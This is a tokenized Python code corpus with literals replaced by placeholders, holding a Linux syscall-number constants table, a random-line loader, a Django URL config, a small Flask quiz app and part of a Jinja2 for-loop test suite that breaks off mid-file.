<EOL> SYS_ftime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ftruncate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ftruncate64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_futex = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_futimesat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getcpu = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getcwd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getdents = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getdents64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getegid = Constant ( '<STR_LIT>' , <NUM_LIT:50> ) <EOL> SYS_getegid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_geteuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_geteuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getgid32 = Constant ( '<STR_LIT>' , <NUM_LIT:200> ) <EOL> SYS_getgroups = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getgroups32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getitimer = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_get_kernel_syms = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_get_mempolicy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getpgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getpgrp = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getpid = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> SYS_getpmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getppid = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> SYS_getpriority = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getresgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getresgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getresuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getresuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_get_robust_list = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getrusage = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getsid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_get_thread_area = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_gettid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_gettimeofday = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_getxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_gtty = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> SYS_idle = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_init_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_inotify_add_watch = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_inotify_init = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_inotify_init1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_inotify_rm_watch = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_cancel = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ioctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_destroy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_getevents = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ioperm = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_iopl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ioprio_get = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ioprio_set = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_setup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_io_submit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ipc = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_keyctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_kill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lchown = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SYS_lchown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lgetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_link = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SYS_linkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_listxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_llistxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS__llseek = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lookup_dcookie = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lremovexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lseek = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lsetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_lstat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_madvise = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_madvise1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mbind = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_migrate_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mincore = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mkdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mkdirat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mknod = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mknodat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mlock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mlockall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mmap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mmap2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_modify_ldt = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mount = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_move_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mprotect = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mpx = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mq_getsetattr = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:5> ) ) <EOL> SYS_mq_notify = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:4> ) ) <EOL> SYS_mq_open = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_mq_timedreceive = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:3> ) ) <EOL> SYS_mq_timedsend = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:2> ) ) <EOL> SYS_mq_unlink = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> SYS_mremap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_msync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_munlock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_munlockall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_munmap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_nanosleep = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS__newselect = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_nfsservctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_nice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_oldfstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_oldlstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_oldolduname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_oldstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_olduname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_open = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SYS_openat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pause = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_perf_event_open = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_personality = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pipe = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pipe2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pivot_root = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_poll = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ppoll = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_prctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pread = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_preadv = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_prlimit64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_prof = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_profil = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pselect6 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ptrace = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_putpmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pwrite = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_pwritev = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_query_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_quotactl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_read = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SYS_readahead = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_readdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_readlink = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_readlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_readv = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_reboot = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_recvmmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_remap_file_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_removexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rename = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_renameat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_request_key = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rmdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigaction = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigpending = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigprocmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigqueueinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigreturn = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigsuspend = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_sigtimedwait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_rt_tgsigqueueinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_getaffinity = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_getparam = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_get_priority_max = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_get_priority_min = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_getscheduler = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_rr_get_interval = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_setaffinity = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_setparam = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_setscheduler = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sched_yield = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_select = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sendfile = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sendfile64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setdomainname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setfsgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setfsgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setfsuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setfsuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setgroups = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setgroups32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sethostname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setitimer = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_set_mempolicy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setpgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setpriority = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setregid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setregid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setresgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setresgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setresuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setresuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setreuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setreuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_set_robust_list = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setsid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_set_thread_area = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_set_tid_address = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_settimeofday = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sgetmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigaction = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigaltstack = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_signal = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_signalfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_signalfd4 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigpending = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigprocmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigreturn = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigsuspend = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_socketcall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_splice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ssetmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_stat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_stat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_statfs = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_statfs64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_stime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_stty = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_swapoff = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_swapon = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_symlink = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_symlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sync_file_range = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS__sysctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sysfs = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sysinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sys_kexec_load = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_syslog = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_tee = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_tgkill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_time = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timer_create = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timer_delete = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:4> ) ) <EOL> SYS_timerfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timerfd_gettime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timerfd_settime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timer_getoverrun = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:3> ) ) <EOL> SYS_timer_gettime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:2> ) ) <EOL> SYS_timer_settime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> SYS_times = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_tkill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_truncate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_truncate64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ugetrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ulimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_umask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_umount = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_umount2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_uname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_unlink = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SYS_unlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_unshare = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_uselib = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ustat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_utime = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> SYS_utimensat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_utimes = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vfork = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vhangup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vm86 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vm86old = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vmsplice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vserver = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_wait4 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_waitid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_waitpid = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SYS_write = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SYS_writev = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_socketcall_socket = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SYS_socketcall_bind = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SYS_socketcall_connect = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SYS_socketcall_listen = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SYS_socketcall_accept = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SYS_socketcall_getsockname = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SYS_socketcall_getpeername = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SYS_socketcall_socketpair = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SYS_socketcall_send = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SYS_socketcall_recv = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SYS_socketcall_sendto = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> SYS_socketcall_recvfrom = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> SYS_socketcall_shutdown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_socketcall_setsockopt = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_socketcall_getsockopt = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SYS_socketcall_sendmsg = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SYS_socketcall_recvmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> import os <EOL> import random as randommod <EOL> _cache = None <EOL> def _load ( ) : <EOL> global _cache <EOL> if _cache is None : <EOL> _cache = set ( ) <EOL> with open ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' <EOL> ) , '<STR_LIT:r>' ) as fd : <EOL> for line in fd : <EOL> if line : <EOL> _cache . add ( line . strip ( ) ) <EOL> return _cache <EOL> def getall ( ) : <EOL> """<STR_LIT>""" <EOL> return _load ( ) . copy ( ) <EOL> def random ( ) : <EOL> """<STR_LIT>""" <EOL> return randommod . choice ( list ( _load ( ) ) ) </s>
<s> from django . conf . urls import patterns , include , url <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> name = '<STR_LIT>' ) , <EOL> ) </s>
<s> from flask import Flask , url_for , request , render_template <EOL> from app import app <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def hello ( ) : <EOL> url = url_for ( '<STR_LIT>' ) ; <EOL> link = '<STR_LIT>' + url + '<STR_LIT>' ; <EOL> return link ; <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def about ( ) : <EOL> return '<STR_LIT>' ; <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def question ( title ) : <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render_template ( '<STR_LIT>' , <EOL> question = question ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> submittedAnswer = request . form [ '<STR_LIT>' ] ; <EOL> if submittedAnswer == answer : <EOL> return render_template ( '<STR_LIT>' ) ; <EOL> else : <EOL> return render_template ( '<STR_LIT>' , <EOL> answer = answer , <EOL> submittedAnswer = submittedAnswer ) ; <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def submit ( ) : <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render_template ( '<STR_LIT>' ) ; <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> question = request . form [ '<STR_LIT>' ] ; <EOL> answer = request . form [ '<STR_LIT>' ] ; <EOL> title = request . form [ '<STR_LIT:title>' ] ; <EOL> return render_template ( '<STR_LIT>' , <EOL> question = question ) ; <EOL> return ; </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from jinja2 . testsuite import JinjaTestCase <EOL> from jinja2 import Environment , TemplateSyntaxError , UndefinedError , DictLoader <EOL> env = Environment ( ) <EOL> class ForLoopTestCase ( JinjaTestCase ) : <EOL> def test_simple ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( seq = list ( range ( <NUM_LIT:10> ) ) ) == '<STR_LIT>' <EOL> def test_else ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_empty_blocks ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_context_vars ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> one , two , _ = tmpl . render ( seq = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) . split ( '<STR_LIT>' ) <EOL> ( one_index , one_index0 , one_revindex , one_revindex0 , one_first , <EOL> one_last , one_length ) = one . split ( '<STR_LIT:|>' ) <EOL> ( two_index , two_index0 , two_revindex , two_revindex0 , two_first , <EOL> two_last , two_length ) = two . split ( '<STR_LIT:|>' ) <EOL> assert int ( one_index ) == <NUM_LIT:1> and int ( two_index ) == <NUM_LIT:2> <EOL> assert int ( one_index0 ) == <NUM_LIT:0> and int ( two_index0 ) == <NUM_LIT:1> <EOL> assert int ( one_revindex ) == <NUM_LIT:2> and int ( two_revindex ) == <NUM_LIT:1> <EOL> assert int ( one_revindex0 ) == <NUM_LIT:1> and int ( two_revindex0 ) == <NUM_LIT:0> <EOL> assert one_first == '<STR_LIT:True>' and two_first == '<STR_LIT:False>' <EOL> assert one_last == '<STR_LIT:False>' and two_last == '<STR_LIT:True>' <EOL> assert one_length == two_length == '<STR_LIT:2>' <EOL> def test_cycling ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> output = tmpl . render ( seq = list ( range ( <NUM_LIT:4> ) ) , through = ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> assert output == '<STR_LIT>' * <NUM_LIT:4> <EOL> def test_scope ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> output = tmpl . render ( seq = list ( range ( <NUM_LIT:10> ) ) ) <EOL> assert not output <EOL> def test_varlen ( self ) : <EOL> def inner ( ) : <EOL> for item in range ( <NUM_LIT:5> ) : <EOL> yield item <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> output = tmpl . render ( iter = inner ( ) ) <EOL> assert output == '<STR_LIT>' <EOL> def test_noniter ( self ) : <EOL> tmpl = env . 